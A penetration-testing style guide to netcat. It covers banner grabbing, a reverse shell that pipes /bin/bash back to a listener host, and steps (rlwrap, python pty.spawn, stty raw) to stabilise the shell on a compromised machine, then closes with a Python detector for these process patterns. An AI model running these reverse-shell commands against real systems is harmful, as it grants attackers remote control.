# Netcat - Advanced

## Usage and Examples

### Using netcat for banner grabbing

```bash
nc 192.168.1.1 80
```

### Reverse shell with netcat

On the listener's machine:

```bash
nc -lvnp 1234
```

(The options `-lvnp` tell netcat to listen (`-l`) verbosely (`-v`) on the given port (`-p`) with no name resolution (`-n`).)

On the target machine (the address is the listener's, since the target connects back to it):

```bash
nc [listener_ip] 1234 -e /bin/bash
```

(Specifying `-e /bin/bash` is optional.)

## Stabilizing Netcat

By default, Netcat shells are often unstable and lack features such as command history, tab completion, and proper terminal handling. Stabilizing the shell turns it into a more robust, interactive session, which improves its reliability and enhances control over the compromised system.

## Methods for Netcat Shell Stabilization

### Using `rlwrap`

Steps:

#### 1. Install `rlwrap` on your local machine if it is not already installed

```bash
sudo apt-get install rlwrap
```

#### 2. Use the netcat command with `rlwrap`

```bash
rlwrap nc -lvnp 4444
```

#### 3. Background the shell with `Ctrl + Z`

#### 4. Re-enter the shell

```bash
stty raw -echo; fg
```

### Upgrading to fully interactive TTY

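Use Python:

#### 1. Spawn a bash shell with a pseudo-terminal

```bash
python3 -c 'import pty; pty.spawn("/bin/bash")'
```

#### 2. Set the terminal type

```bash
export TERM=xterm
```

#### 3. Put the local terminal in raw mode and foreground the shell

```bash
stty raw -echo; fg
```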

### Setting terminal variables

Steps:

#### Background the netcat shell

Press `Ctrl + Z`.

#### Set terminal type

```bash
stty raw -echo; fg
```

#### Export terminal variables

```bash
reset
```

```bash
export SHELL=bash
```

```bash
export TERM=xterm
```

```bash
stty rows [number] columns [number]
```

(Replace `[number]` with the appropriate values for your terminal size.)

## Overview of Netcat Shell stabilization

Step 1:

Use Python to spawn a better-featured bash shell, which will make our shell look a bit prettier.

```bash
python3 -c 'import pty;pty.spawn("/bin/bash")'
```

We still won’t be able to use tab autocomplete or the arrow keys.

Step 2:

Get access to terminal commands such as `clear`.

```bash
export TERM=xterm
```

Step 3:

Now, background the shell.

```
Ctrl + Z
```

Step 4:

Use the following back in the normal terminal:

```bash
stty raw -echo; fg
```

This does two things: first, it turns off our own terminal echo, which gives us access to tab autocompletes, the arrow keys, and Ctrl + C to kill processes. Second, `fg` brings the backgrounded shell back to the foreground.

Step 5:

Finally, correct the distorted rows and columns of the terminal in which we type commands. The values below are examples; use the size of your own terminal.

```bash
stty rows 38 columns 116
```
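
From the defender's side, the commands on this page leave a recognizable process trail: a netcat process started with an exec option, followed by a Python `pty.spawn` one-liner underneath it. The following is an added example, not part of the original page, that flags both in process-creation records; the record format, sample events, rule names and severities are constructed for illustration.

```python
import re
import shlex

# Constructed process-creation records ("pid ppid command line"); not real logs.
SAMPLE_EVENTS = """\
4100 1 nc 10.0.0.5 1234 -e /bin/bash
4105 4100 python3 -c 'import pty; pty.spawn("/bin/bash")'
4200 900 nc -zv 10.0.0.9 22
4300 900 python3 -c 'import pty; pty.spawn("/bin/bash")'
4400 900 rsync -e ssh /srv/data backup:/srv/data
"""

NETCAT = {"nc", "ncat", "netcat", "nc.traditional"}
EXEC_OPTS = {"-e", "--exec", "-c", "--sh-exec"}  # run a program on connect
PTY_SPAWN = re.compile(r"\bpty\s*\.\s*spawn\s*\(")


def classify(argv):
    """Name the rule one argv list matches, or return None."""
    prog = argv[0].rsplit("/", 1)[-1]  # strip any directory prefix
    if prog in NETCAT and EXEC_OPTS.intersection(argv[1:]):
        return "netcat-exec"
    if re.fullmatch(r"python[\d.]*", prog) and "-c" in argv[1:-1]:
        if PTY_SPAWN.search(argv[argv.index("-c") + 1]):
            return "pty-spawn"
    return None


def detect(log_text):
    """Return [(pid, rule, severity)] for each flagged record, in log order."""
    parent, rule = {}, {}
    for line in filter(str.strip, log_text.splitlines()):
        pid, ppid, cmdline = line.split(None, 2)
        parent[int(pid)], rule[int(pid)] = int(ppid), classify(shlex.split(cmdline))
    alerts = []
    for pid, name in rule.items():
        if name is None:
            continue
        # netcat-exec is always high; a PTY spawn is high only when some
        # ancestor is a netcat-exec process (the upgrade sequence above).
        severity = "high" if name == "netcat-exec" else "medium"
        cur, seen = parent[pid], set()
        while severity == "medium" and cur in rule and cur not in seen:
            severity = "high" if rule[cur] == "netcat-exec" else "medium"
            seen.add(cur)
            cur = parent[cur]
        alerts.append((pid, name, severity))
    return alerts
```

In production the same logic would read from a real process-creation source (for example audit or EDR telemetry) and the `-c` match would need tuning for netcat builds where that flag has a different meaning.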
